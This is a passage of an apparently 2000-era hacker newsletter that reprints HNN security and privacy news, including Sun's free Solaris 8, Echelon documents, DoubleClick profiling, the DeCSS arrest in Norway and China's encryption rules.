Free and Open ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Jay When Solaris 8 is unveiled Wednesday in New York it is expected that Sun will also announce that the software will be free as well opening access to the software's source code. Solaris 8 is expected to ship in February. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Sun fights Linux, WinNT with 'free Solaris' By Deborah Gage, Sm@rt Reseller January 24, 2000 8:58 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html?chkpt=zdhpnews01 Sun Microsystems Inc. is expected to eliminate licensing fees for Solaris 8 to boost its appeal against Linux and Microsoft Windows NT, say sources close to the company. Sun is expected to make its "free Solaris" campaign the centerpiece of its Solaris 8 unveiling, which takes place this Wednesday in New York City. At that event, Sun also is expected to announce it will open up access to Solaris 8 source code. Solaris 8 is due to ship in February, around the same time Microsoft is due to ship Windows 2000. McNealy: Set it free Sun CEO Scott McNealy has been laying the groundwork for the announcement for months by telling audiences that software is a service and should be free. McNealy recommended last year that the government require Microsoft to make free and open its application program interfaces, rather than break itself into pieces, as a preferred remedy in the current Department of Justice vs. Microsoft antitrust investigation. "Free" is a relative term, however. Sun in December eliminated fees for Java 2 Standard Edition but still requires developers to pay for compatibility tests required to maintain their licenses. And Linux advocates and other industry watchers have claimed that the Sun Community Source License is not as free or open as Linux and other open-source licenses are. Sun will pitch Solaris 8 against Microsoft's high-end Windows 2000 package called Windows 2000 Datacenter, which is in beta and won't be commercially available until midyear, at best. Sun in November announced a free early access version of Solaris 8. Sun is positioning Solaris 8 as the most scalable and reliable network operating system on the market. Microsoft, which stepped up its Windows 2000 marketing campaign within the past week, in anticipation of the Feb. 17 rollout of the product, is touting Windows 2000's reliability as its main selling point. Zander: We'll never do Linux Microsoft's not Sun's only worry. Sun must fend off growing encroachments by Linux, which not only is free but also is becoming more robust with help from Sun competitors IBM Corp., Intel Corp. and Hewlett-Packard Co. Sun President Ed Zander told financial analysts last week that Sun will never adopt Linux as its operating system but will instead "put every ounce of R&D we have into Solaris." "It amazes me to watch IBM and all those other companies chase Linux the way they did Windows NT five years ago," Zander said. Sun has been working for over a year to offer Solaris under the Sun Community Source License but was stymied by the fact that it didn't own all the intellectual property inside Solaris. SCSL is a quasi open-source license that requires developers to return bug fixes to Sun, maintain compatibility and pay fees to Sun when they ship binaries based on Sun source code. It is unclear how Sun has resolved its intellectual property issues. But that isn't stopping the company from working to get on the good side of the open-source community. Sun is sponsoring ApacheCon 2000, the first official conference of the Apache Software Foundation upcoming in March, and is helping with the Apache Foundation's Jakarta and Java Apache projects. @HWA 53.0 HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Brian Oblivion For years DoD officials have claimed that the global eavesdropping network known as Echelon was nothing more than a myth fabricated by journalists. Now recently declassified papers by the NSA actually confirm the existence of the operation. The NSA Declassified http://www.gwu.edu/~nsarchiv/NSAEBB/NSAEBB23/index.html (Go to the url theres a lot of material there - Ed) @HWA 54.0 HNN: Jan 25: Japan Needs US Help With Defacements ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench On Monday Japan's Science and Technology Agency and Japan's Management and Coordination Agency had their web sites defaced. This is con in the first-ever defacement of a Japanese government computer system. Japanese officials have said that they will be seeking assistance from US officials in tracking down the perpetrators. Reuters - via Yahoo http://dailynews.yahoo.com/h/nm/20000125/wr/japan_hackers_1.html Tuesday January 25 12:44 AM ET Japan Says to Seek U.S. Help to Deal With Hackers TOKYO (Reuters) - Japan said on Tuesday it will seek help from the United States in an investigation into hackers who penetrated two government Web sites. Computer systems at Japan's Science and Technology Agency were raided on Monday and its homepage was replaced with derogatory messages insulting the Japanese in the first-ever hacking of a Japanese government computer system. Agency officials declined to give details of the derogatory messages. The homepage was also replaced with a direct access switch to adult magazine web sites, agency officials said. Several hours later, Japan's Management and Coordination Agency also discovered a similar incident at its Web site. Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the incident, including possible help from Washington which was more advanced in dealing with hackers. ``The government must take all necessary measures including seeking help from the United States,'' Aoki told a regular news conference. An agency spokesman said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration. @HWA 55.0 HNN: Jan 25: Car Radios Monitored by Marketers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Soon we'll have to wear implants in our penises so that condom manufacturers can collect stats on how often their product is used for fucking. - Ed From HNN http://www.hackernews.com/ contributed by Evil Wench Originally developed as a means to gather real time Radio ratings information, technology created by Alabama based MobilTrak is now being used by marketers. The road side devices hone in on emissions from car radios to determine exactly what station they are turned to. Now concert promoters are using the technology to determine what station concert attendees listen to as they park cars their cars when attending concerts. Wired http://www.wired.com/news/technology/0,1282,33799,00.html Your Ears Are Their Business by Noah Shachtman 3:00 a.m. 25.Jan.2000 PST Even in the car, there's no hiding from marketers' prying eyes -- and ears. Companies like concert mega-promoter SFX Entertainment are using a new device to find out what's being played on customers' radios as they pull into venue parking lots. The information is supposed to help businesses gauge the effectiveness of radio advertising campaigns. But the system -- built by Alabama start-up Mobiltrak and installed at 13 SFX locations in Los Angeles, Phoenix, Atlanta, and elsewhere -- is coming under fire from privacy experts. "Nobody would think that they're being monitored in a parking lot. And nobody would think that there's something of value in listening to a radio station while they're in that parking lot," said Brooklyn Law School professor Paul Schwartz. But there is something of value here, and the people listening don't get any of that value. They're being polled without knowing they're in a poll." By contrast, when the local supermarket videotapes your weekly grocery run, or Dell monitors your tech support call -- even when SFX tracks your visit to its Web site -- the companies let you know you're being observed. The major traditional measurement companies, like The Arbitron Company and Nielsen Media Research pay a small stipend to the people they survey. Mobiltrak counters that such efforts aren't needed with their system. Individual cars aren't being tracked, they argue, so there's no invasion of an individual's privacy. "We can't link to a particular automobile. It's just not technically possible," claims Lucius Stone, Mobiltrak's director of sales and marketing. "It's a high-volume, random sample. It can only measure one radio at a time. And there's no way of telling which radio it is. It's most analogous to a traffic counter." The technology relies on a simple principle: Every FM radio is not only a receiver, but a transmitter, too, emitting the same radio frequency (or "RF") as the station to which it's tuned. That's why airlines ask passengers to turn off their radios during takeoff and landing: to prevent interference with pilots and air traffic controllers' communications. Mobiltrak picks up these RFs leaked from car radios' oscillators, and counts what stations are being played. Many in the privacy community fear that the temptation to use this information to breach established bounds of discretion will be too great for Mobiltrak to resist. "If it's merely aggregate information, not tied to an individual, then it's not really a concern," says Jason Catlett, president of consumer privacy group Junkbusters. "But there's an economic incentive to get down to the individual level, and a precedent for using the same technology to look at the individual householder." Like Mobiltrak, the British Broadcasting Company scrutinizes RF emissions. By law, British residents must have licenses for the television sets they own. The BBC deploys vans equipped with oscillation detectors to residential neighborhoods to enforce the law. The vans track which homes are equipped with TV sets, and then checks again to make sure that the residents have licenses for the TVs. "TV license enforcement is the main reason that women end up in prison in the UK," University of Cambridge cryptographer Ross Anderson wrote in an email. "The detector vans operate during the day, so when they find an unlicensed set and knock on the door, it's usually a woman who answers. A fine of 1,000 pounds is imposed, and if she can't pay it she goes to jail." What's more, Anderson and his colleagues have shown that the U.S. National Security Agency and others have long been able to use RF emissions to reconstruct what's on a computer monitor. But this invasive operation is a far cry from what Mobiltrak is doing, say some media business insiders. "I haven't met one person in the radio industry that's the least bit concerned about this from a privacy standpoint, as it currently exists," reports Ron Rodrigues, editor-in-chief of the trade magazine Radio & Records. Still, Rodrigues acknowledges, "We seem to be in a period when disclosure is becoming more important. With Mobiltrak, there may have to be some sort of disclosure that people are being monitored, like radar on the California highways." Schwartz, the Brooklyn law professor, believes something more than notification may be in order. "We can collect all this information in new ways. But who should get the benefits of this information?" he asks. "Is it like minerals on the deep sea bed outside the continental shelf, exploitable for whoever can get to it first? Or should we return some of the benefits in more direct ways to the people who created it?" @HWA 56.0 HNN: Jan 26:DoubleClick Admits to Profiling of Surfers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid Internet Advertising Agency Doubleclick, has started to match up web surfing habits with actual names and addresses, according to USA Today. DoubleClick's recent acquisition of Abacus Direct Corp , a direct-marketing services company that maintains a database of names, addresses, telephone numbers and retail purchasing habits of 90% of American households has made this possible. By matching surfing habits with actual names and addresses Doubleclick is better able to target ads and offer 'personalized' service. The Electronic Privacy Information Center plans to file a complaint with the Federal Trade Commission by Feb. 16. USA Today http://www.usatoday.com/life/cyber/tech/cth211.htm C|Net http://news.cnet.com/news/0-1005-200-1531929.html?dtn.head USA Today; Activists charge DoubleClick double cross Web users have lost privacy with the drop of a cookie, they say By Will Rodger, USATODAY.com Say goodbye to anonymity on the Web. DoubleClick Inc., the Internet's largest advertising company, has begun tracking Web users by name and address as they move from one Web site to the next, USATODAY.com has learned. The practice, known as profiling, gives marketers the ability to know the household, and in many cases the precise identity, of the person visiting any one of the 11,500 sites that use DoubleClick's ad-tracking "cookies." What made such profiling possible was DoubleClick's purchase in June of Abacus Direct Corp., a direct-marketing services company that maintains a database of names, addresses and retail purchasing habits of 90% of American households. With the help of its online partners, DoubleClick can now correlate the Abacus database of names with people's Internet activities. Company spokeswoman Jennifer Blum said Tuesday that only about a dozen sites are participating now. But she acknowledged that DoubleClick would like all its partner sites to participate. DoubleClick defends the practice, insisting that it allows better targeting of online ads -- and thus makes consumers' online experiences at once more relevant and more profitable for advertisers. The company calls it "personalization." Consumer advocates have another term for it: privacy invasion. After being informed of DoubleClick's actions, several privacy activists said they would file a formal complaint with the Federal Trade Commission next month. "This is a blatant bait-and-switch trick," says Jason Catlett of Junkbusters Inc., an Internet-privacy consultancy. "For four years they have said (their services) don’t identify you personally, and now they're admitting they are going to identify you." To tie Doubleclick's "anonymous" records of your surfing habits to its Abacus database, it needs only the cooperation of another site that can identify you positively. Futuristic though that sounds, positive identification is actually simple. DoubleClick need only tie your cookie to another one placed by a site that ships you something through the mail, or one which requires registration. To do that: DoubleClick sends a cookie to your browser and gives it a unique ID number. Doubleclick sends the same ID number on to the site that knows who you are. That company then sends back the data that DoubleClick needs to look you up in the Abacus database. And voila -- DoubleClick knows who you are, too. The combination of DoubleClick's cookie-derived information -- more than 100 million files -- with Abacus' database on the purchasing habits of 90 million households means the vast majority of Web-connected Americans will likely lose their online anonymity, says David Banisar, deputy director of Privacy International. DoubleClick's Blum said she was not sure whether surfing habits tracked by DoubleClick before Abacus data are merged will be included in future profiles. DoubleClick executives maintain they still give users who don't want to be tracked a chance to opt out. "That person will receive notice that their personal information is being gathered," DoubleClick Senior Vice President and Abacus unit chief Jonathan Shapiro says flatly. Yet, that chance to opt out comes only in the form of a few lines of text placed in the privacy policies of participating Web sites. Since those policies are often buried two or three levels down, online consumers will seldom know what is being done with their personal information in the first place, let alone that they may opt out, activists say. "That is not permission," Banisar says. "That is fraudulent on its face." Catlett, Banisar and the Electronic Privacy Information Center plan to file a complaint with the Federal Trade Commission by Feb. 16. They say they will charge that DoubleClick has duped consumers by suggesting the company's technology lets them remain anonymous. They expect to enlist a wide array of consumer groups to back their position. Further troubling to privacy advocates is DoubleClick's refusal to say which Internet sites are furnishing them the registration rolls that DoubleClick needs to link once-anonymous cookies to names, addresses, phone numbers and catalog purchases. "The fact that DoubleClick is not disclosing the names of the companies who are feeding them consumers' names is a shameful hypocrisy," Catlett says. "They are trying to protect the confidentiality of the violators of privacy." Shapiro Tuesday bristled at Catlett's characterization. Any company that uses data from the Abacus database to target Internet ads must disclose it online, he says. Moreover, he adds, DoubleClick itself would hand over to privacy advocates the list of participating companies if it could. But as in many lines of business, partners frown when their relationships are disclosed without their permission, he says. "If they all bought a billboard and said they work with us, that would be great," Shapiro says. The controversy over DoubleClick began last summer, when the company announced it was buying Abacus Direct in a deal valued at more than $1 billion. Privacy experts had feared that DoubleClick would begin merging the two databases at some point. But they say they were unaware that DoubleClick had begun its profiling practice late last year. Before its Abacus purchase, DoubleClick had made its money by targeting banner advertisements in less direct ways. DoubleClick ad-serving computers, for instance, check the Internet addresses of people who visit participating sites. Thus, people in their homes may see ads different from those seen by workers at General Motors, or a machine-tool company in Ohio. Every time viewers see or click on those banners, DoubleClick adds that fact to individual dossiers it builds on them with the help of the cookies it drops on users' hard drives. Those dossiers, in turn, help DoubleClick target ads more precisely still, increasing their relevance to consumers and reducing unnecessary repetition. Those cookies remained anonymous to DoubleClick until now. Being tracked as they move around the Web "doesn’t measure up to people's expectation on the Net," says Robert Smith, publisher of the newsletter Privacy Journal. "They don't think that their physical locations, their names will be combined with what they do on the Internet. If they (DoubleClick) want to do that they have to expose that plan to the public and have it discussed." -=- CNET: Privacy fears raised by DoubleClick database plans By Courtney Macavinta Staff Writer, CNET News.com January 25, 2000, 8:10 p.m. PT Having sealed its purchase of a direct marketing company, DoubleClick has begun signing up sites to create a network that will tie Web surfers' travels with their personal information and shopping habits--online and off. The leading Web advertising company plans to build a database of consumer profiles that will include each user's "name, address, retail, catalog and online purchase histories, and demographic data," according to the company's new privacy policy. The database, which the company says will only be seen by DoubleClick, is intended to help members of its budding, U.S.-based Abacus Alliance perfect their target marketing. The move comes a little over a month after New York-based DoubleClick completed its $1.7 billion acquisition of Abacus Direct and in the wake of the Federal Trade Commission's November probe on the growing trend of online profiling. Privacy advocates, who protested the deal from the start, have unsuccessfully tried to get the FTC to review the implications of the merger because they say it means one thing for consumers: less privacy. Until recently, DoubleClick's policy was to not correlate personal information with its 100 million cookies, which are scattered worldwide. But the new database will rely on the cookies, which the company places on Net users' computers to record surfing habits and display pertinent advertising. Net users aren't informed when they are given a DoubleClick cookie unless their browser is preset to do so, but they can "opt out" through the company's Web site. The more than 11,500 sites that belong to DoubleClick's network could feed into the new database, which will correlate with the personal information in Abacus' existing database of more than 2 billion consumer catalog transactions. The rollout was first reported by USA Today. DoubleClick says that not all of the sites using its ad technology will join the alliance. "They have to somehow have something to give to be a member of this," said Jennifer Blum, DoubleClick's spokeswoman. The new database works like this: In the past, if a person named Jane Doe had a DoubleClick cookie that detected that she loved golf-related sites, the company could show her ads for sports-related content. But in the future, if the same surfer gives personal information to a member of the Abacus Alliance, DoubleClick will know a lot more about her: that her name is Jane Doe, and that she used to buy sweaters and pants via Company X's catalog but hasn't done so for years. However, Jane did buy a coat online last month. Now DoubleClick can advise Company X to target Jane with Net ads instead of sending her a catalog. "Yes, of course this will be done," Blum said. "The goal here is to match up the information." DoubleClick says that the focus of the alliance is to eliminate junk mail and to give consumers information about products they want. But privacy advocates charge that the combined companies are finally acting on their potential to create one of the most extensive consumer profiles ever. "Privacy advocates have been saying for years that marketers will turn the Net into a gigantic data-gathering machine for junk mail, telemarketing and advertising; now that machine is working," said Jason Catlett, founder of Junkbusters, a clearinghouse for privacy-protection measures. DoubleClick contends that before members of the Abacus Alliance put information into the new database, they must inform consumers. "Going forward, when a consumer puts in personal information to a Web site that is a member of this alliance, they will be told that the information will be shared with other parties," Blum said. "Consumers are given notice and choice if they want to opt out." Blum said that once companies join the alliance they also must give Net users notice that their information is going to be shared--even if that person has shared information with the Web site before. But privacy watchdogs say an opt-out policy is not fair to consumers who may not realize that when a company says their information is being shared with a "third party," it's really the potentially enormous DoubleClick database. "DoubleClick is trying to characterize this as choice, but its practice is based on opt out, not opt in," Catlett said. "We said this would happen-- behold it quietly has." @HWA 57.0 HNN: Jan 26: Support for DeCSS Author Grows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Gee the EFF is supporting this case? i'm amazed. - Ed From HNN http://www.hackernews.com/ contributed by Jan and Zorro Support for Jon Johansen, the 16 year old Norwegian author being persecuted by the MPA, is growing. Johansen and his father where arrested and their computer equipment confiscated yesterday. They were charged with violation of copyright laws. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnntop C|Net http://news.cnet.com/news/0-1005-200-1531192.html?tag=st.ne.ron.lthd.1005-200-1531192 Wired http://www.wired.com/news/business/0,1367,33889,00.html CNN http://cnn.com/2000/TECH/ptech/01/25/dvd.charge/index.html Aftenposten - English version http://www.aftenposten.no/english/local/d121315.htm Electronic Frontier Foundation http://www.eff.org/IP/Video/DeCSS_prosecutions/Johansen_DeCSS_case/20000125_eff_johansen_case_pressrel.html ZDNet; -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- DVD hacker arrested in Norway By Reuters January 25, 2000 11:30 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2427192,00.html?chkpt=zdnnto p A Norwegian teenager has been charged with distributing a software program that enables users to make unauthorized copies of DVD movies, police said on Tuesday. Jon Johansen is thought to have developed a program "that breaks the entire copyright protection of the DVD (digital versatile disc) system," said Inger Marie Sunde, a senior public prosecutor at Norway's economic crime unit. "He is charged with breaking intellectual property laws," said Sunde. Johansen's father was also charged in the case, since the teen posted the source code on a Web site owned by his father. Johansen refuted the charges in a CNN Norway article, saying that he has done nothing wrong. The 16-year-old student stressed that the program he and others on the Internet created was only meant for playing DVDs on computers running the Linux operating system. Previously, when the movie industry contacted him and asked him to remove the source code, he complied so as to avoid a lawsuit. Despite his cooperation, the movie industry is suing anyway. Major Hollywood studios, which use an encryption scheme on their DVDs to prevent unauthorized copying, have already taken legal action against three people in the United States who displayed Johansen's program on their Web sites. Computer equipment confiscated His program, known as DeCSS, is thought to have been the first program posted to the Internet that resulted from reverse engineering the DVD copy protection system. Norwegian law firm Simonsen Musaeus said in a statement it had reported Johansen and his father, Per Johansen, to the police earlier this month on behalf of the Motion Picture Association (MPA), a lobby group for seven major Hollywood studios. Sunde told Reuters police had questioned Jon Johansen late on Monday, searched his home and confiscated computer equipment. "He is a suspect, and we found that there were reasonable grounds for a search," she added. Other sites reported that two computers, a cell phone and some CDs had been taken by police. In addition, Johansen had to inform police of all his passwords. Simonsen Musaeus acts on behalf of U.S. license agency DVD Copy Control Association and the MPA, which represents major Hollywood studios such as Sony's Sony Pictures Entertainment Inc., Seagram Co. unit Universal Studios Inc. and Warner Bros., a Time Warner Inc. (NYSE: TWX) unit. A U.S. district court in New York on Friday ordered three people to remove Johansen's DeCSS program from their Web sites after the MPA filed a complaint. DVDs store sound and pictures digitally on an optical disc with a storage capacity considerably greater than that of a regular CD-ROM. -=- CNET; Teen charged in connection with DVD cracking tool By Courtney Macavinta Staff Writer, CNET News.com January 25, 2000, 5:00 p.m. PT update Norwegian police questioned and charged a 16-year-old student who sent the U.S. movie industry into a frenzy when he helped create a program that breaks the encryption on DVDs that spread like wildfire on the Net. In an interview today, Jon Johansen said that police raided his house yesterday to collect evidence stemming from allegations that he violated trade secrets to create a program called DeCSS, which cracks the security code in the DVD Content Scrambling System. That, in turn, allows people to view digital movies through unauthorized players, such as computers running the Linux operating system. Police seized several computers, a Nokia cellular phone and some CDs and then charged Johansen with breaking security to gain unauthorized access to data or software. He and his father, whose company's Web site was used to post the program, also were charged with copyright infringement. The son and father face two to three years in prison and fines if convicted. Johansen said that several people developed the program to allow users to play DVDs on various PCs. The effort is described on OpenDVD.org. "Our goal was to make it possible to watch DVDs under the Linux operating system," Johansen wrote in an email. In the wake of the release of DeCSS, the film industry has vigorously tried to stamp out the program. The Motion Picture Association of America (MPAA) filed a lawsuit in New York against individuals who allegedly posted the program on their Web sites; the organization also is a founder of the DVD Copy Control Association, which filed a similar lawsuit in California. The judges in both cases have issued preliminary injunctions prohibiting the defendants from posting the code through the duration of the trials. But Johansen argues that the MPAA has misled the public into believing that his program allows people to more easily copy DVDs. "The (motion picture industry) is claiming that their encryption was copy protection," he said. "The encryption is in fact only playback protection, which gives the movie industry a monopoly on who gets to make DVD players." The Electronic Frontier Foundation, which is defending the parties in both cases, argues that people have a right to discuss the "the technical insecurity of DVD" and demonstrate their points through reverse engineering. The DVD association was formed in December of last year by companies that also are members of the MPAA, the Business Software Alliance and the Electronic Industries Alliance to license out the DVD Content Scrambling System. -=- Aftenposten; (NO response from host at print time) -=- EFF; FOR IMMEDIATE RELEASE January 25, 2000 Norwegian Teen Becomes Industry's Latest Test Case Motion Picture Industry Continues Campaign Against Open Source Software Community Over DVD Security San Francisco -- The home of a Norwegian teenager was raided by the police today acting at the behest of the motion picture industry intent on suppressing discussion and distribution of DVD-viewing software developed outside of industry's monopoly on such software. This action follows closely three lawsuits filed by the industry in California, New York, and Connecticut against numerous individuals and organizations including coders, journalists, an ISP, and numerous Netizens. "The motion picture industry is using its substantial resources to intimidate the technical community into surrendering rights of free expression and fair use of information," said Tara Lemmey, Executive Director of the Electronic Frontier Foundation. "These actions are a wake-up call for the technical community. The process of reverse-engineering and public posting and commenting of code that the MPAA is attempting to suppress is fundamental to the development of commercial and open source software." Sixteen-year-old Jon Johansen, who was among the first to post the DeCSS program that allows users to view DVDs on computers not using Windows or Macintosh operating systems, had his computer and cellular telephone seized by police. Both he and his father were questioned at length by the police and have been threatened with indictment for posting the code, which the motion picture industry claims was illegally created. According to several international legal experts contacted by EFF, the industry is relying on untested legal theory in its case against Johansen. With regard to the industry's use of Norwegian Criminal Code sect 145(2), a provision making it illegal to "break a security arrangement" to access data, experts agree that it is not clear whether it can apply to a situation where someone breaks a security system to access material on a device of which that person is the owner. The second charge of contributory copyright infringement, as likely to be argued in this case, has also not been before the Norwegian courts. The actions being brought by the motion picture industry have attracted the attention of the Global Internet Liberty Campaign (GILC), a coalition of over 50 international civil liberties and human rights groups. "We believe that intellectual property owners should not be allowed to expand their property rights at the expense of free speech, legal reverse-engineering of software programs for interoperability reasons, and discussions of technical and scientific issues on the Internet," wrote GILC members in a statement released last week. "DVD-CCA's lawsuit is in direct conflict with United Nations human rights accords and the First Amendment of the United States Constitution." (EFF is a GILC member.) EFF will continue fighting the industry's attempts to censor Web sites discussing DVD technology, including assisting Johansen and his family in finding legal representation in Norway. All of these steps are part of EFF's Campaign for Audiovisual Free Expression (CAFE), which it launched last summer to address complex societal and legal issues raised by new technological measures for protecting intellectual property rights. For complete information on the MPAA and DVD-CCA cases, see: http://www.eff.org/IP/Video To learn more about EFF's Campaign for Audiovisual Free Expression, see: http://www.eff.org/cafe For information on the Global Internet Liberty Campaign, see: http://www.gilc.org The Electronic Frontier Foundation ( http://www.eff.org ) is a leading global nonprofit organization linking technical architectures with legal frameworks to support the rights of individuals in an open society. Founded in 1990, EFF actively encourages and challenges industry and government to support free expression, privacy, and openness in the information society. EFF is a member-supported organization and maintains one of the most-linked-to Web sites in the world. [end] @HWA 58.0 HNN: Jan 26: China To Require Crypto Registration ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond Starting next Monday Chinese government officials will require that all businesses operating within China must register the type of commercial encryption software they use. The regulations also bar Chinese companies from buying products containing foreign-designed encryption software. US National Newspaper - via Cryptome http://cryptome.org/cn-crypto.htm 25 January 2000. Thanks to Anonymous. Source: US national newspaper, January 25, 2000 Foreigners Must Disclose Internet Secrets to Beijing Soon Encryption Rules For Firms Threaten Growth of the Web By MATT FORNEY BEIJING -- The Chinese government is about to require foreign firms to reveal one of their deepest secrets -- the type of software used to protect sensitive data transfers over the Internet. By next Monday, foreign and Chinese companies must register the type of commercial encryption software they use. Such software makes it more difficult for hackers -- or governments -- to eavesdrop on electronic messages. Eventually, the companies must provide details of employees who use the software, making it easier for authorities to monitor personal and commercial use of the Internet. In addition, the regulations bar Chinese companies from buying products containing foreign-designed encryption software. A strict interpretation would include such products as Netscape browsers or Microsoft Outlook, as well as the more complex equipment vital for conducting business securely over the Internet. The rules are the latest sign of Beijing's unease with the Internet, which has been used by dissidents and members of the banned sect Falun Dafa to communicate and spread information. Authorities have tried to block sites and require users to register, but the number of users continues to rise and now totals about nine million. The new rules, however, could slow the Internet's groswth here. If companies offering electronic business services worry that the Chinese government is monitoring their transmissions, they could relocate outside China's borders, where they wouldn't have to reveal the type of encryption software they use. "This is sending the wrong message to foreign investors," says Patrick Powers director of China operations for the U.S.China Business Council, who adds that "the foreign business community is deeply concerned." So is the U.S. government, which recently approved the export of many types of encryption software. Commerce Secretary William Daley plans to raise the issue with senior Chinese officials this week in Switzerland during the annual World Economic Forum. China revealed the new regulations on Oct. 15, in an order published in the Communist Party's flagship newspaper, the People's Daily. It demanded that "foreign organizations or individuals using encryption products or equipment containing encryption technology in China must apply" for permission by Jan. 31. It exempted diplomatic missions. After meeting that application deadline, foreign companies must fill out a second round of paperwork. According to a copy of the forms, companies must name employees who are using encryption software and give the location of the computers they use, as well as their e-mail addresses and telephone numbers. The order adds that "no organization or individual can sell foreign commercial encryption products." If enforced, the regulations would certainly complicate the development of the Internet in China. Most of the routers and servers that compose the nerve center of China's networks come from foreign companies. and often include encrypted software to ensure secure communications. The rules could force delays in network construction as Chinese software companies struggle to expand their encryption services. "If IBM or Hewlett-Packard wants to sell an e-commerce Web server to China, it might have to isolate which parts relate to security" and then find Chinese companies to write the software, says Jay Hu, director of the Beijing branch of the U.S. Information Technology Office, an industry research group. "I don't think Chinese companies have that ability." Neither International Business Machines Corp. nor Hewlett Packard Co. would comment. The encryption regulations could apply to just about anything that transmits sensitive digital information, including cell phones, Internet browsers and e-mail software. Microsoft's Outlook program uses low-level encryption, and the company might have to seek Chinese partners to design it anew. Alick Yan, a spokesman for Microsoft (China) Co., said it's too early to gauge the potential impact. The government has created a new agency to enforce the regulations, but it isn't clear who controls the body. "We report to the State Council," which is China's cabinet, explained director Yang Lingjun, who declined to comment further. However many foreign-company officials, speaking anonymously, say they're afraid the organization is staffed by the Ministry of State Security, China's secret police. @HWA 59.0 HNN: Jan 26: NEC Develops Network Encryption Technology ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Code Kid NEC Corp said on Wednesday it developed a new encryption technology to protect data on the Internet and other networks. The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack. Reuters - via Yahoo Wednesday January 26, 5:43 am Eastern Time NEC develops encryption technology for networks TOKYO, Jan 26 (Reuters) - NEC Corp said on Wednesday it developed a new encryption technology to prevent hackers from tapping into business-to-consumer exchanges on the Internet and other networks. The new technology, Cipherunicorn-A, creates several false keys in addition to the true encryption key, making it especially difficult for potential intruders to crack, NEC said. The technology also features a dynamic encryption code that can use key lengths of 128, 192 or 256 bits, offering higher levels of security than conventional methods with a fixed length of 128 bits, an NEC spokesman said. The electronics maker aims to develop software utilising the new technology as soon as possible, he said, although he gave no specific time frame. Worries about Internet hackers were heightened in Japan this week after humiliating raids on government Web sites, in which hackers linked one to a pornographic site and attacked the nation's war record on another. @HWA 60.0 HNN: Jan 26: UPS announces Worldtalk secure email. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench From HNN http://www.hackernews.com/ UPS has announced the launch of Worldtalk, a product aimed at securing corporate e-mail while in transit. It also claims to block SPAM and Viruses. UPS is offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange. (There is so much hype and marketing fluff in this press release it is hard to pick out the facts. On the surface this looks like nothing more than a glorified SSL package.) United Parcel Service http://www.ups.com/bin/shownews.cgi?20000124badnews Bad News for Hackers, Crackers Worldtalk, UPS Combine Powerful Security Solutions to Safeguard Critical Information SANTA CLARA, Calif. and ATLANTA, Ga., Jan. 24, 2000 -- Worldtalk and UPS today announced the launch of a cutting edge security product combining industry-leading solutions to protect critical business information on a company's Web site or in transit via e-mail. The new product, WorldSecure/Mail for UPS OnLine Courier, integrates Worldtalk's award-winning WorldSecure products with UPS Document Exchange for a lethal one-two punch against hackers or crackers looking to gain access to confidential information on the Web. Worldtalk's award-winning WorldSecure products, based on the WorldSecure policy management platform, enable organizations to define and enforce content security policies for e-mail and the Web. Worldtalk's products provide organizations with the ability to reduce corporate liability, secure intellectual property, guarantee confidentiality of communications with trading partners and protect network resources. WorldSecure/Mail ensures the confidentiality and privacy of Internet communication, protects information assets, and blocks viruses and SPAMs. UPS Document Exchange guards sensitive information in transit between one organization's server and another's. Armed with 128-bit encryption on the server and optional password protection, UPS Document Exchange offers secure, trackable electronic delivery of anything that can be contained in a digital file, including documents, images and software, along with definitive proof of delivery. Combined, the two products allow an organization to establish criteria by which specific types of sensitive documents or information can leave its network only via UPS Document Exchange - and are automatically converted into a secure UPS Document Exchange digital package before sending. Meanwhile other, less sensitive information can still be sent by conventional e-mail. Both companies will sell the integrated solution. As an added security measure, UPS is putting its money where its mouth is by offering companies up to $100,000 for business losses as part of its customer assurance plan when using UPS Document Exchange. Solutions that protect the security of sensitive documents become even more important as businesses communicate more frequently over the Internet. By the year 2001, 35 percent of business documents - 21 million per day - will move via the Internet, according to the Aberdeen Group. "With the combination of WorldSecure and UPS Document Exchange, organizations can ensure their sensitive documents won't be floating around unprotected in the wildly unsecure world of e-mail," said Kim Marchner, Group Manager for UPS Document Exchange Marketing. "An organization has the power to define which types of documents - like prospectuses or confidential reports from its legal department - will be required to carry the protection of Document Exchange when leaving the server." An important feature of UPS Document Exchange is its ease of use by both sender and receiver. Unlike unwieldy encryption programs that require the sender and recipient to have the same type of encryption software, Document Exchange requires only that the sender have a standard e-mail package, and the receiver have a standard Web browser. "Organizations want to leverage the economy, efficiency and ubiquity of Internet e-mail," said Jim Heisch, President and CFO, Worldtalk. "Solutions like WorldSecure/Mail and UPS Document Exchange allow them to simply and efficiently define and enforce policies that 